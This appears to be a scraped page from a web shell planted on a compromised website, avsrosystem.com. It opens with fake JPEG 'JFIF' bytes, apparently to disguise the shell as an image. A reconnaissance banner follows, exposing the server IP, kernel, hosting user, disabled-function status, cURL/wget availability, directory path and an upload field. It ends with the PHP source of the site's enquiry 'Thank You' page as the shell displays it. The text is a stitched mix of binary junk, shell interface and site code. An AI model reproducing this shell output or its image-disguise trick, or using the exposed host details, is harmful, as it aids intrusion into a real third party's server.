���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.203 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/avsrosystem.com/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AVS Ro System</title> <?php include 'assets.php' ?> <!--=====JQUERY=======--> <script src="assets/js/jquery-3-7-1.min.js"></script> </head> <body class="body"> <div class="paginacontainer"> <div class="progress-wrap"> <svg class="progress-circle svg-content" width="100%" height="100%" viewbox="-1 -1 102 102"> <path d="M50,1 a49,49 0 0,1 0,98 a49,49 0 0,1 0,-98"></path> </svg> </div> </div> <!--=====progress END=======--> <!--=====PRELOADER START=======--> <!--=====PRELOADER END=======--> <?php include 'header.php' ?> <div class="common-hero" style="background-image: url(assets/img/about-banner1.jpg);"> <div class="container"> <div class="row"> <div class="col-lg-6"> <div class="common-hero-heading"> <h1 class="text-60 sm:text-30 md:text-30 leading-56 font-semibold white">Thank You</h1> <div class="page-change"> <ul> <li class="inline-block"><a href="index.php" class="inline-block text-16 leading-16 white font-semibold">Home</a></li> <li class="inline-block arrow text-16 leading-16 white font-normal"><i class="fa-solid fa-angle-right"></i></li> <li class="inline-block text-16 leading-16 white font-normal">Thank You</li> </ul> </div> </div> </div> </div> </div> </div> <!-- About Start --> <section class="thank-you"> <h1 class="text-success">Thank You!</h1> <p>Your Enquiry has been submitted successfully. </p> </section> <style> .thank-you{padding: 80px 0; text-align: center;} .thank-you h1{font-size: 60px; } .thank-you p{font-size: 20px; font-weight: 700;} </style> <!-- About End --> <?php include 'footer.php'?>